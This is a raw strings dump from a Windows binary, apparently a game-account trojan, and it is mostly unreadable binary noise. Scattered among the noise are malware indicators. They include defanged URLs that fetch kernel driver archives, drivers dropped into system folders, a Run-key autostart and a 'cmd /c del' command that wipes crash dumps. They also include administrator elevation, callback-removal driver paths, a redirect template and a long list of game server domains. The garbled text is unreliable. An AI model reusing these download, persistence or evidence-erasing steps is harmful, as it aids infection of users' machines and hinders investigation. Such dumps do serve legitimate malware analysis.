$$$%%%'''&&& ###)))***$$$ )))...!!!

$$$'''&&&)))---,,,((($$$ %%%###

!!!%%%!!!

$$$***,,,((($$$   &&&

$$$'''%%%### %%%$$$

&&&   '''!!! )))&&&

&&&!!!$$$

###&&&%%%

%%%(((***$$$"""&&&!!!

'''...111 ###

###%%% !!!$$$..."""((('''

%%33111

(((555;;;777

!!!###&&&)))&&&"""%%%'''   ,,,''',,,)))((('''###

"""...(((###&&&'''"""

!!!%%%   ((($$$ ###$$$%%%!!!

###''',,,%%%"""

###---)))!!!

''',,,!!!

%%% $$$%%%$$$

""")))''' $$$

"""'''###!!!$$$(((###

   """ %%%)))%%%((()))!!!

"""$$$(((###

&&&((('''&&&%%%###"""

###&&&(((,,,   ***)))&&&

!!!###%%%'''(((&&&$$$!!!$$$)))&&&$$$%%%'''###"""$$$!!!

)))""" """&&&###

!!!$$$###

'''&&&###%%%

!!!&&&(((&&&"""!!!

''')))***,,,(((!!!&&&

$$$%%%(((%%%&&&

%%%&&&%%%""",,,###"""###"""

!!!""" """(((""" $$$!!!

%%%---!!!

GGG@@@)))<<<;;;...FFFKKK999SSS___,,,

&&&"""'''&&&###

(((...CCCmmmdddccc222

'''&&&'''$$$"""

###%%%"""

-2!16 27!6:%7<(7?%<D&@G'CJ)EL,HO/KR/LS1NU2MW3NX3NX4PW7SY7SZ7R\6Q[6SZ5RY6RY8T[2NU4PW4PW4QX4PW5QX3OV4PW4PW4PW5QX4PW4PW7SZ8T[6RX8TZ7SY8TZ7SY6RY5QX4PW5QX3PW4PW3PV5QW3PW4PW4PW4PW3OV4PW7SY7SZ7SZ7SZ7SZ7SZ5RY7SZ3PV3OU4OY4PW4PW6PW4PW3OY3NX6PW5QX4OY5PZ5PZ4PW4PW4PW7SZ9SY7SY6RX7SY7SY8RX8T[.JT3NZ7QW7SY,LR

(.Vju

/4!08%4<%7<$9=%<C&@F)CI)EK,HO-JQ.JT1MW2OV2OV2OV3PW7SZ7SZ6RY6RY7T[6SZ6RY8T[3OV4PW4PW4PW3PW5QX3OV4PW3PW3PW3OV4PW4PV7SY7SY8TZ8TZ6RX8TZ8TZ7S]3OY4PW4PW3OV2OV4QX0PV3OV4PW3OV4PW5QX3OV7SZ7SZ8RY8RY6RY7SZ7T[7SZ5QX4PW4PW4PW6RY3OV4PW5QX2NU4QX4PV3OU4PW6PW6RY5QX5QX7SZ8TZ9U[6RY7SZ:T[7SZ7SZ/KR5PZ5OV8RY.KQ

]{~.JQ"<BY{

,1 05#38$49%7<'9>%<D(?G)CI EK,HO.JQ0LS2NU3OV3OV3OV4QW6RX7SZ7SZ7SZ8T[7SZ6RY7SZ5QX5QX4PW4PW4QX2OV4QX3PW4QW4QW3PV4QW6RY6RY7SZ7SZ6RY8T[7SZ7SZ7R\4OY3OY4QX2OV2OV3PW3PW4PV5QX4PW4PW4PW4PV5QW8TZ7R\6Q[7SZ8T[6SZ6SZ4PZ3OY4PW3OV7QX6PW5OV6PW3OV5QX3PV3PV3OU4PV4PV3OU4PV7SY6SZ7SZ7SZ7T[6SZ9U\5QX1MT3PW3PW6RX/HX

/// ???...XXX

"""###"""###"""!!!

~~~___^^^"""

......---...------...---...///......---......---...------...//////---...///...000EEECCCDDDCCC///111///333//////333555GGGHHHGGGGGG......111000///666<<<444000111000//////000...///...999FFFFFF@@@999333,,,111......---***...444;;;<<<>>>888,,,---...000000...,,,///,,,666MMMMMMLLLDDD888000111---...111---//////---///000------...LLLJJJMMMLLL---,,,...???MMMMMMKKK999,,,      ---...---/////////.........///---,,,   ------...000---      ---,,,DDD(((

((('''&&&))),,,)))(((

%%%***'''

<<<:::555444888

???<<<333555&&&

>>>@@@777888

...DDD;;;:::;;;777

...KKK@@@===@@@???!!!

...CCC

...TTTAAAAAABBBAAA!!!

...LLL

444\\\...

444,,,000---

...mmmjjjkkkllllllmmmnnnmmmlllllljjjmmmooommmkkkmmmkkkooolllnnnmmmlllccceeeeeebbb'''lllccc

$$$%%%###%%%###

)1.JQ

 0 .3"14"36#5:$8?$9=#=D&@G'BL)DN,HO-IP/KR2NU2NU3OV3OV5QX5QX7SZ6R\6R\7SY7SY7SZ7SZ5QW4PV4PW4OY4OY4OY4OY4OY4PW4PW4PV3OU3PW6SZ7T[6RY7SZ7SZ7SZ7SZ6RY5QW3OV4OY5QX3NX4NZ4OY4PZ4PW4PW3PW4PZ5QX7SY7SY7SZ7SZ7SZ7R\6SZ6RY4PW4PV4PW4PW4PW4QX3PW4QX3PV4PV4PW4PW4PW4PW4PW4PW5QX9SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

-IZ.J[.KZ0JZ'>T

.1!25"27!38&8=%:>&=E%?F EL)DN-HR-HR0JV1KW1NT3OU3OU4PV6SV6SV6RX:TZ7T[6SZ5QX8T[2NU6RY4PW4PW4OY5PZ2LX5O[5O[3MY5O[4NZ5QW6RX7SY8TZ6RX7SY6RX7SY7R\6Q[4OY1NU4PZ4PZ4PZ5QX4PW5QX4PW5QX4PW4PW8TZ7SY7SY7SZ7SZ7SY6RX6RX4PW4PW4PW3OV6PW6PW4PW4PW2NT5QW3PW3PW4OY5PZ3NX3MY5PZ6Q[8TZ6RX7SY8TZ8U[7SY7SY.JQ3QT2NX9TW.IS

,/!/4"14"36%5:&8=$9=#=D&@G'BL)DN,HO.JQ/KR1MT2NU3OV3OV5QX4QX7SZ6R\6R\7SY7SY7SZ7SY5QW4PV4PW3OY4OY3NX3NX4OY4PW4PV4PV3OV4PW6RY7SZ6RY7SZ7SZ7SZ6RY6RY5QX4PW4NZ4QX4OY3OY3PW5RY4PW3PW3OY3PW4PW7SY7SZ7SZ7SZ7SZ7SZ7SZ6RY4PV4PV4PV4PW4PV2OV3PW3PV3PW4PV4PW3PW3PW3PW4PW4PW5QX7SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

&CR(CW'AQ DT*BT.EU)GS*DQ*CS'@R*DQ

.Xu1GY.KZ.I]

.GY1GY-IZ*IX&?O

$$$&&&###"""$$$

...###@@@...YYY

***,,,000

///...

!!!111000555444\\\

###222777

)))444666999444

999777;;;888

666555!!!

666...888;;;[[[

888:::===???

666222;;;???^^^

Ýdlllnnnlllkkklllmmmlllmmmmmmkkkkkklllmmmmmmmmmnnnnnnkkknnnmmmkkkmmmuuu

}}}___```

$$$%%%$$$%%%$$$

\\\hhhppp111''' *** ===...ZZZ

}}}---,,,

(7),01444

'9=82<.342

9T.mn,

%fkk4

{`.cF

-.VU2

1975/08/21

, #&')*)

-0-(0%()(

.In4i.o-

1900/01/01

2007:02:07 02:59:30

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.htm;*.html)|*.htm;*.html

its:%s::%s

x86 Family %s Model %s Stepping %s

X-X-X-X

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

c:\%original file name%.exe

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

inflate 1.2.3 Copyright 1995-2005 Mark Adler

#include "l.chs\afxres.rc" // Standard components

WinExec

RegCreateKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetKeyState

GetKeyboardType

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

E577??

!D457?@

!D77??

[,,,,///

,/===0/

[,,,////

$,$$,(<@

#(/<<<=@@?<<("

$//<==//

/<=?@@=/,/<?@

$,//<<==@

???86&$""

##'''####

#'.'''.'''#

#'..(((...'#

BGI30.1.0.16

<assemblyIdentity version="1.0.0.0" name=".add"/>

<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

oledlg.dll

1.0.0.0

windowswf

mscoree.dll

_ChangePassword

(*.*)

1.1.0.0

%original file name%.exe_1828_rwx_00401000_00432000:

t%SVh

t$(SSh

|$D.tm

~%UVW

t.It It

u$SShe

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

u%CNu

MaxKeySize

Invalid key size

%UUUU1E

%UUUU3

5 passes)

1.2.3

DB00735E-CFFB-47E6-B060-BB0D74008B7A

94-401@163.com

Bv=kAv.SCv

ws2_32.dll

Kernel32.dll

ntdll.dll

shlwapi.dll

user32.dll

advapi32.dll

psapi.dll

Urlmon.dll

wininet.dll

Wininet.dll

ICMP.DLL

version.dll

GetProcessHeap

MsgWaitForMultipleObjects

GetWindowsDirectoryA

ShellExecuteA

URLDownloadToFileA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

RegOpenKeyA

RegCloseKey

DeleteUrlCacheEntry

2434595645!

wshom.ocx

WindowStyle

Hotkey

\Data\Config.ini

127.0.0.1

woool.dat.update

hXXp://VVV.hqkjwy.com:88/dlqtj.html

@#%s!

popup.dat

fhdlqxf.txt

Widget.dll

cliqos.dll

Game.ini

GroupNick0

ServerPort

WidgetContent.IE.dll

.rsrc

9=|

5\pUWSSHYzZ

(}9D%F

]CvL,

VQR`"%U;!

.Be$>;

g21r%Wr0/.Wr%W-, %Wr%*)r%Wr('&Wr%W%$#:v

VXX\.BKj

WudP

A.DNE

%SxI8

Uq.NL;(

.UTX@9

.IY\p,

A.tCDo

~_\.Wl

(.eC:

.WPya

`%Ua`

xs.MI!&

Zc#P%c

.kwFt

*.lrR

\.pL.

el32.dll

>6Qt%c

(()@-3$-

},z%C

l  O%cR

.PA5>C0>2

axKey7

eH.Cl

PJ.J.TXJ.J.\`K

XT.J.JPL%J.JH

hsSH>

8-%X<

;44.fB$

.fZNt

DB00735E-CFFB-47E6-60

94(01@163.

%Y]%F]

Acqui.Rf/

MICKEY

AAD.DJ

O.OPP

%d&&'

W%*.*f

2CNotSupported

96.Ae

mu_.fe,g

_DZwMsg

ELECTED4.MSVCRT

,.PAV

'5X%S

*.* G1

(&07-034/)7

.tp#3

%s:%d/=

.Eh.dE^

keyw

?n.NNn

*.yUW

Gl.chs\S

H.Jk

eg1Key

< 3)20,6

O.rsrc

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

ReportClientQos

?.mF$

WLBÄ

P.RlN

u.Hs,

%c&px|

5\tUWSSHh

&FtPoq0Hv

#X>.Ptm|t

${E.PH

,H.QB

.Jw'j\Q

0.2A.DNE

"nÎ

!KÀ

~*K.HF

A.tCDH

`@;8x%x

c4 &.ITf

C.kwFt

t]&%uAK

NO.OPK

'&%$$#""!!

W%*.*

gCNotSupported

Resourl

CmdTarf

ECTED4.MSVCRT

B.XPgo

X%Sm'

.*.*o

tH%s<

%s:%d/u%

h.dE7

r.nJg1~_

zcÁ

.r%.hXA

QKey9

.uK97

\ `.ra]

*.exe

hXXp://tianya.bianqian8228.com:789/

.xinchangyang.cn/

hXXp://

20170101

\data\woool.dat.update

.SESj

6]%X[tl}T

k\<Ts<\%SHK

_&NI%Xh0U

f%u9]

%DjLhV

\UWSSHh

 "UDp

(.ni0

\k-.dE

>.Ptm|tc

.QTC!

PBi@.HD

%C$$$

[.LUr

D(.YPW

%X@!L

l(%U4:

jF RSSh6

%CIt#

Çc$

}%U4s

A.tCD

9 .pk

xlÕ7

x S%u' J

.PSad

^}%.x2

h.ly&

.hd\R

6.uL/

SFC.kwFt

x%xD?

<#,user32.dll

6ACC.DLLT

[lzndowPr8AkF.eg

hXXp://w

.hqkjwy.c

C:\WIN

102.54.9

38.25.63.10xyp

/.- *)(''&%$$#""!!

%*.*f

.Arm.

*OCmdT"

..HLP

SVCRTgr

X`hB.trp

.PAVC@@)I

%s:%d)

RIFF%x

1.6.7

.Ehho

!Gl.chs\S-

cKey

UrlA3%

}.mKK;

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

RASAPI32.dll

WININET.dll

.text

`.rdata

@.data

@.reloc

vSSSh

tGHt.Ht&

FTPjK

FtPj;

C.PjRV

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

operator

portuguese-brazilian

\\.\%c:

\\.\SafeWall

/c del /f /s /q c:\windows\minidump\*.*

C:\Windows\MEMORY.DMP

cmd.exe

C:\Windows\Temp\1.sys.rar

C:\Windows\Temp\1.key.rar

%s\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall.rar

C:\Windows\System32\SafeWall.sys

%s\Drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/SafeWall64.rar

C:\Windows\SysWOW64\drivers\SafeWall.sys

hXXp://x6.tianyuanfalan.com/sys.rar

%s\Temp\sys.dat

%s\Temp\sys.key

%s\Temp\sys64.dat

%s\Temp\sys64.key

\*.dat

\Drivers\*.sys

\temp\Config.dat

hXXp://x6.tianyuanfalan.com/Config.rar

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

C:\Users\Blackeyes\Documents\Visual Studio 2008\Projects\Phoenixer\Release\Phoenixer.pdb

KERNEL32.dll

ExitWindowsEx

RegDeleteKeyA

RegOpenKeyExA

urlmon.dll

imagehlp.dll

PSAPI.DLL

GetCPInfo

GetConsoleOutputCP

h.rdata

H.data

.reloc

pk.fujianhuafeng.com

hXXp://pk.fujianhuafeng.com:88

ECInf->Key%x

Hash%x

ECInf->FileBufferLen%d

119.145.148.

162.212.181.

192.126.127.

125.88.181.

183.60.200.

45woool.com

44woool.com

zhaowoool.com

zhaocs.com

huocs.com

fireol.com

8cs.com

jielesh.com

woool2017.com

600sf.com

xlcomic.com

021sjjc.com

45ci.com

bdtiandao.com

lke5.com

45woool.org

zjlscnc.com

guanmei2008.com

dtggc.com

93u.com

woool2sf.com

chinahuaman.com

176fgcqsf.com

shaibar.com

ucwoool.com

65535cs.com

quwoool.com

88woool.com

sf999.com

fhdlq.com

28pk.com

ggwoool.com

wooolsf.com

5b.com

HTTP/1.1 301 Found

Location: %s

c:\safewall\safewall_x86\objfre_win7_x86\i386\SafeWall.pdb

KeDelayExecutionThread

ZwDeleteKey

ZwOpenKey

ntoskrnl.exe

KeStallExecutionProcessor

HAL.dll

.pdata

Hash %x

ECInf->Key %x

ECInf->BB %x

in line:%d

c:\safewall\safewall_amd64\fucksys.c

at file:%s

c:\safewall\safewall_amd64\objfre_win7_amd64\amd64\SafeWall64.pdb

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

<VeriSign Class 3 Public Primary Certification Authority - G50

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

hXXps://VVV.verisign.com/cps0*

#hXXp://logo.verisign.com/vslogo.gif04

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>

6#6-6;6{6

: :<:@:\:`:

hXXp://VVV.360.cn/superaid/index.html

fhdlqxf.exe

%s\Drivers\UnlockCallback_x64.sys

C:\Windows\SysWOW64\drivers\UnlockCallback_x64.sys

%s\Drivers\UnlockCallback.sys

C:\Windows\System32\drivers\UnlockCallback.sys

c:\Windows\fhdlqxf.txt

C:\Users\Blackeyes\Documents\Visual Studio 2008\Projects\PassPhoenix\Release\PassPhoenix.pdb

CertGetNameStringA

CryptMsgGetParam

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CryptMsgClose

CRYPT32.dll

MSVCR90.dll

_amsg_exit

_acmdln

_crt_debugger_hook

c:\users\dumingqiao\desktop\source\objfre_win7_x86\i386\EnumRemoveCmpCallback.pdb

7%7U7

c:\users\dumingqiao\desktop\source\objfre_win7_amd64\amd64\EnumRemoveCallback.pdb

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

2"2(2.242:2@2

Software\chuanshi\web

\Data\config\ItemCfg.INI

\Data\config\default\bestitem.INI

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

hXXp://VVV.hqkjwy.com:88/h.txt

116.211.24.226

vreport

windows

Battle.net

$Recycle.Bin

data\woool.dat.update

Software\Microsoft\Windows\ShellNoRoam\MUICache

\0-49-3d.nmp

dWEbo

úG0

n#e.jzPxt

.Dt[:js

U#y.aPKwH

]4O%UMp&

2cpÞ

g^.Lt

=.Rx>/

V=.ev&2

.WKM\-

t%DkT

.rO@]

V.rP?

CE.rC

.NaEb

.qPzM

.oKty[

M.nN-H

fB%s:

Q~(%c

8.Ww4

P.Dy4

" .eXqit

Yh2%Ud

S.jLu

V\jiangjunling01.nmp

\jiangjunling02.nmp

Oi%xK_<

^t%dk

-d}Gt

3s4%U

\wuxing.nmp

%sBdN

%sJdN

:1975/08/21

Http://

Adobe Photoshop CS2 Windows

2011:12:22 11:54:23

urlTEXT

MsgeTEXT

hXXp://ns.adobe.com/xap/1.0/

<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-111">

<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">

xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">

xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/">

xmlns:xap="hXXp://ns.adobe.com/xap/1.0/">

<xap:CreatorTool>Adobe Photoshop CS2 Windows</xap:CreatorTool>

xmlns:xapMM="hXXp://ns.adobe.com/xap/1.0/mm/"

xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#">

<stRef:documentID>adobe:docid:photoshop:4de4def4-ecd0-11e0-9a10-a9350357c235</stRef:documentID>

xmlns:dc="hXXp://purl.org/dc/elements/1.1/">

xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/">

IEC hXXp://VVV.iec.ch

.IEC 61966-2.1 Default RGB colour space - sRGB

CRT curv

.fM,k

.kp:S

?idWF.fE

-0 /2#25"27$6;#7>"7?#=C$@F&CJ*FM-IP0JQ/KQ1MS1NT4PW3OV4PW6RY7SZ8T[6Q[7SZ8TZ7SZ7SZ5QW4QT5QW4OY3PW4QX3PW3PW3PW3PW4QX4PW4PV7SY7SZ6RY7SZ7SZ6RY7SZ8SV4PV3PW2OV4PW5QX4PW3OV3PW4PW3OV5PZ2OV4PW6RX6SZ9SY7SZ7SZ8T[6SY8TZ4PV4PV4PW4PZ4PZ3OY3OY3PW3OY5PZ4NZ5PZ4OY4OY5PZ4OY5QX7SZ:UX7SY7SZ7SZ7SY7SZ6RY-IS4RU4OY:TZ.JT

 .Zv|Qkw

-2#16"27$49"6=$9@$>D&@F(DK)EL,HO-IP0KU2MW3OV3OV3OV5QX6RX7SY7SY7SZ8S]7SZ7SY8TZ3OU5QX4PV4PV1QV0PU3PV4QW2OV3PW1NU4QX3OV7SZ5QX7SZ7SZ6RY8T[6RY7SY3OU5QW4PW4PV5QW5RX3PV4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3QT3PV3PV3PW5QX3OV5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

-2!16"27$49"6=%9@$>E$@G(DK)DN*FP-IS/JT3NX4PW3OV3OV4PW6RY7SZ7SZ7SZ8T[7SY5RX8TZ3OU5QW4PW4PV0PV/OT4QW4QW1NU5RY1NU4QX4PW7SZ6RY6RY7SZ6RY8T[7SZ8T[2NU5QX3OV4PV5QW4RU2PS4PW6RY3OV5QX4PW3OV7SZ7SZ8T[5QW8U[8TZ5RX6SY4QW3PW3PW5QX3OV5QX4PW5QX5QW4PV3PV3PV3PV3PW4PW5QX5QX6RY7SY7SZ7SZ7SZ8T[9U\8RY0JQ6N[.PV9R\-HT

###$$$"""$$$&&&

!!! !!! """ """###!!!

|||___^^^"""

...---,,,---   ,,,,,,,,,......---...,,,---...---///...111...000222000///...000HHHJJJEEEDDD444,,,   111.........111000>>>EEEEEE???444......111   ///???EEEGGGEEE555000000.........111111000---///BBBFFFCCCEEE555000   ,,,,,,...444<<<BBBGGGAAA...------...---///111...---EEEKKKMMMOOO888/////////---   ///000...111   000///***///---,,,///,,,...KKKKKKMMMCCC???333   ***---,,,,,,------...///..................---------//////------///***,,,,,,FFF&&&

???<<<222444555666

777666333777

@@@<<<333888666555

999???@@@???>>>@@@

%%%XXXXXXXXXLLL

...RRR]]]^^^\\\\\\___^^^JJJ

999888666444

888999000

!!!999;;;===:::)))

...vvv

[[[(((&&&|||

]]]___"""

###$$$%%%$$$%%%

 / /2"14"36i&8=$8@%<D'@J'BL)DN,HO.JQ/KR1MT1MW2OV2OV3PW7SZ7SZ7SZ6RY7SY7SY7SY7SY4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX4PW4PW5PZ7R\9SZ9SY9SY9SY7SY7SZ9SY4PW3OY5RY4PW3OV4OY4PZ4OY6PW4PW4PW5QX4PV6RX7SY7SY7SY7SZ7SZ7SZ7SZ4PW5QX4PW5QW4PV4PV5QX3PW4PW7QX4OY5PZ4OY5PZ4PW4PW4PW6RY9SY7SZ7SZ6RY9SY:T[6RY/KU3PW4PZ9SY/KR

05!38#5:%7<&8=%<D&@G*DK*FM,HO.JQ0KU1LV2NU3OV3OV4PW7SY7SY7SY7SZ:T[9SZ6RY8T[3PW5QX4PW4PW5QX4PW4PW4PW4PW4PW4PW4PW5QX7SZ7SZ7SZ7SZ7SZ7SZ7SZ5T]4PZ4OY6OY4OY4OY3PW1QW3NZ3NZ3NZ3NZ3NZ3NZ6Q]7R^9SZ7QX9R\:T[6RY7SZ3NX4OY3OV4PW4PW4PW4PW5QX4PW3PV3PW4QX3OY4OY4OY3NX4PW7SZ9U[6RY7SZ8T[8T[6RY8T[.JQ4QW4PW9TW/JT

)0.JQ 7?Dbm

}}}|||~~~

,,,!!!???...XXX

   ...rrr

......,,,---,,,---------...000......---///...---/////////////////////000...DDDFFFFFFGGG---IIICCCBBB>>>777444...//////000111///222,,,///000......///000555///000000HHHIII<<<000.../////////000...///000   :::FFF777   ,,,......666<<<BBBIII===///------...   ///---...---EEEKKKMMMMMM666000///...---...///111///...---222......,,,,,,000000------JJJKKKNNNFFFAAA111---))),,,,,,...---......///.........///...---,,,,,,---...111,,,,,,000   ,,,,,,EEE&&&

>>>===444555444666

SSSHHH"""

---444333555444

>>>999444666555444

...555:::444666:::

000:::888999:::888<<<888

???@@@===///

...NNN;;;;;;<<<<<<<<<<<<<<<<<<<<<======<<<:::===<<<===>>>===???===>>>===999<<<<<<EEE'''

...SSSGGG))) !!!

...lll!!!

;;;777000

:::999888999

...jjjlllnnnkkklllkkklllnnnjjjnnnkkklllmmmnnnjjj

###%%%###$$$%%%

|||{{{|||}}}~~~|||~~~

!!!###***

@@@```~~~

999(((555>>>

111""">>>$$$

888///,,,

111...///

;;;---111

(((444((()))

EEE444111111...LLL

333   ---   ...OOO

"""'))***$$$

$$$***)))555999)))%%%

222:::888555666[[[

%''(%'$#%

$'#(&&%&(

!!!###$$$(((&&&

"""'''((("""

"""'''   """

$$$%%%'''%%% ###(((***$$$ )))...!!!

!!!888...;;;

!!!&&&!!!

&&&   (((,,,   ,,,)))%%%""" $$$

"""&&&$$$###$$$'''&&&!!!

$$$   ,,,((($$$   &&&

!!!'''"""

$$$'''&&&### %%%$$$

"""'''***'''&&&   $$$

###&&&%%% %%%(((***$$$!!!%%%

'''...111 ###

&&& &"*(('''$$$'''"""

$$$###"""%%%)))'''###)))111555444333

###%%% !!!$$$..."""(((&&&

%%D4111

%!"%"(((###"""###!!!

"""...((($$$&&&'''"""

 (*3.1./1346$!%

)))$$$&&&(((%%%

,,,((( ((()))!!!

&&&'''&&&!!!

###(((   %%%"""

###---***!!!

''',,,"""

222^^^%%%

%%%!!!###%%%$$$

""")))&&& ###

   """ $$$)))%%%((()))!!!

!!!$$$'''###

*&'(((&&&'''%%%$$$"""

)))""" !!!&&&###

$$$%%%&&&"""

!!!'''&&&###%%%

,,,%%% ###!!!"""

###'''"""

"""'''$$$ ###

''')))***,,,)))!!!&&&

$&&&%'&$$'''

%%f6   ***$$$!!!###!!!

#"&'&((&&!&%'%%,**###"""###!!!

! # "#!!!

$),)""" $$$!!!

"""'''&&&

%%%..."""

FFF???)))<<<;;;...EEEKKK999TTT```,,,

(((...CCCmmmdddddd222

'''(((''''&(!$!!"

###$$$"""

~~~```@@@

'''666''')))

000@@@~~~

)))***"""

'''.00,**)))%##

. )022230...'))

-&  ""!#

"'()(%!"$

###'''(((###

$$$%%%'''%%% ###(((***$$$ )))...!!!

$$$(((&&&)))---   ((($$$ &&&###

&&&***(((,,,   ,,,)))%%%""" $$$

*=@%CO

!'#$&&&$&&'''$$$'''"""

***55589=866

" !#%&"(((###"""###!!!

"""!!!%%%'''

'&(((('''&&&%%%###"""

!!!###%%%'''(((&&&$$$!!!$$$)))&&&###%%%'''###"""$$$!!!

%##%&#(((#%%&'$

$&&%$&(%#"($   ###"""###!!!

" () """ $$$!!!

'&()(%&')%%%%"$

---   ***___

888!!!888%%%...PPP

999'''555>>>

111"""===%%%

999///,,,

(((666((()))

'''000   )))$$$

---000222...)))

...qqq???

###((("""

!!!111!!!

!!!###%%%'''&&&

...;;;|||

"""''',,,"""

""")))***!!!

$$$%%%'''&&& ###)))***$$$ )))...!!!

$$$'''&&&)))---,,,((($$$ %%%###

!!!%%%!!!

$$$***,,,((($$$   &&&

$$$'''%%%### %%%$$$

&&&   '''!!! )))&&&

&&&!!!$$$

###&&&%%%

%%%(((***$$$"""&&&!!!

'''...111 ###

###%%% !!!$$$..."""((('''

%%33111

(((555;;;777

!!!###&&&)))&&&"""%%%'''   ,,,''',,,)))((('''###

"""...(((###&&&'''"""

!!!%%%   ((($$$ ###$$$%%%!!!

###''',,,%%%"""

###---)))!!!

''',,,!!!

%%% $$$%%%$$$

""")))''' $$$

"""'''###!!!$$$(((###

   """ %%%)))%%%((()))!!!

"""$$$(((###

&&&((('''&&&%%%###"""

###&&&(((,,,   ***)))&&&

!!!###%%%'''(((&&&$$$!!!$$$)))&&&$$$%%%'''###"""$$$!!!

)))""" """&&&###

!!!$$$###

'''&&&###%%%

!!!&&&(((&&&"""!!!

''')))***,,,(((!!!&&&

$$$%%%(((%%%&&&

%%%&&&%%%""",,,###"""###"""

!!!""" """(((""" $$$!!!

%%%---!!!

GGG@@@)))<<<;;;...FFFKKK999SSS___,,,

&&&"""'''&&&###

(((...CCCmmmdddccc222

'''&&&'''$$$"""

###%%%"""

